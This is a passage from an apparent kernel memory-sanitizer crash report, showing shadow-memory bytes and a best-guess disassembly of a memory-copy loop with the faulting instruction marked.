ff1100010a11c600: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
ff1100010a11c680: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
==================================================================
----------------
Code disassembly (best guess):
0: 48 83 fa 20 cmp $0x20,%rdx
4: 0f 82 86 00 00 00 jb 0x90
a: 40 38 fe cmp %dil,%sil
d: 7c 35 jl 0x44
f: 48 83 ea 20 sub $0x20,%rdx
13: 48 83 ea 20 sub $0x20,%rdx
17: 4c 8b 06 mov (%rsi),%r8
1a: 4c 8b 4e 08 mov 0x8(%rsi),%r9
1e: 4c 8b 56 10 mov 0x10(%rsi),%r10
22: 4c 8b 5e 18 mov 0x18(%rsi),%r11
26: 48 8d 76 20 lea 0x20(%rsi),%rsi
* 2a: 4c 89 07 mov %r8,(%rdi) <-- trapping instruction
2d: 4c 89 4f 08 mov %r9,0x8(%rdi)
31: 4c 89 57 10 mov %r10,0x10(%rdi)
35: 4c 89 5f 18 mov %r11,0x18(%rdi)
39: 48 8d 7f 20 lea 0x20(%rdi),%rdi
3d: 73 d4 jae 0x13
3f: 83 .byte 0x83